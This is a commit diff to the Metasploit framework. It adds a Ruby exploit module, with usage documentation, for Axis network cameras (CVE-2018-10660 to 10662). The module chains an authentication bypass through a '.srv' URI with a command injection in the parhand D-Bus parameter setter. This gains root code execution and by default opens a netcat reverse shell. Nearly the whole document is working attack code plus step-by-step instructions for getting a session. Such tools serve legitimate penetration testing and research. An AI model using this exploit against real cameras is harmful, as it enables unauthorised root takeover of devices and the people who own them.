Land #10300, Add root exploit for Axis network cameras

2018-07-25 14:46:04 -05:00 · 2018-07-25 14:46:04 -05:00 · 5fce9d8222
parent 428623f890
commit 5fce9d8222
2 changed files with 144 additions and 0 deletions
--- a/documentation/modules/exploit/linux/http/axis_srv_parhand_rce.md
+++ b/documentation/modules/exploit/linux/http/axis_srv_parhand_rce.md
@ -0,0 +1,26 @@
+This module exploits multiple vulnerabilities against Axis Network Cameras, including an authentication
+bypass in the .srv functionality, as well as a command injection in "parhand", in order to gain
+arbitrary remote code execution under the context of root.
+
+The exploit currently only supports the following payloads:
+
+* cmd/unix/bind_netcat_gaping
+* cmd/unix/reverse_netcat_gaping
+
+## Vulnerable Application
+
+The particular firmware (Companion Dome V) tested for this exploit was 6.15.4, web version 16.05.02.
+
+For a list of affected Axis products, please go to the following page:
+https://www.axis.com/files/sales/ACV-128401_Affected_Product_List.pdf
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `exploit/linux/http/axis_srv_parhand_rce`
+3. Do: `set rhosts [IP]`
+4. Do: `show payloads` to select a payload (that is not ipv6)
+5. Do: `set payload [name of payload]`
+6. Set LHOST if you are using a reverse shell
+7. Do: `run`
+8. You should get a session
--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@ -0,0 +1,118 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  #include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Axis Network Camera .srv to parhand RCE',
+      'Description'    => %q{
+        This module exploits an auth bypass in .srv functionality and a
+        command injection in parhand to execute code as the root user.
+      },
+      'Author'         => [
+        'Or Peles',       # Vulnerability discovery (VDOO)
+        'wvu',            # Metasploit module
+        'sinn3r',         # Metasploit module
+        'Brent Cook',     # Metasploit module
+        'Jacob Robles',   # Metasploit module
+        'Matthew Kienow', # Metasploit module
+        'Shelby Pace',    # Metasploit module
+        'Chris Lee',      # Metasploit module
+        'Cale Black'      # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2018-10660'],
+        ['CVE', '2018-10661'],
+        ['CVE', '2018-10662'],
+        ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
+        ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
+      ],
+      'DisclosureDate' => 'Jun 18 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix'],# 'linux'],
+      'Arch'           => [ARCH_CMD],# ARCH_ARMLE],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Unix In-Memory',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {
+           'BadChars'  => ' ',
+           'Encoder'   => 'cmd/ifs',
+           'Compat'    => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'}
+         }
+        ],
+=begin
+        ['Linux Dropper',
+         'Platform'    => 'linux',
+         'Arch'        => ARCH_ARMLE,
+         'Type'        => :linux_dropper
+        ]
+=end
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'}
+    ))
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+=begin
+    when :linux_dropper
+      execute_cmdstager
+=end
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => "/index.html/#{rand_srv}",
+      'vars_post' => {
+        'action'  => 'dbus',
+        'args'    => dbus_send(
+          method: :set_param,
+          param:  "string:root.Time.DST.Enabled string:;#{cmd};"
+        )
+      }
+    )
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => "/index.html/#{rand_srv}",
+      'vars_post' => {
+        'action'  => 'dbus',
+        'args'    => dbus_send(method: :synch_params)
+      }
+    )
+  end
+
+  def dbus_send(method:, param: nil)
+    args = '--system --dest=com.axis.PolicyKitParhand ' \
+           '--type=method_call /com/axis/PolicyKitParhand '
+
+    args <<
+      case method
+      when :set_param
+        "com.axis.PolicyKitParhand.SetParameter #{param}"
+      when :synch_params
+        'com.axis.PolicyKitParhand.SynchParameters'
+      end
+
+    args
+  end
+
+end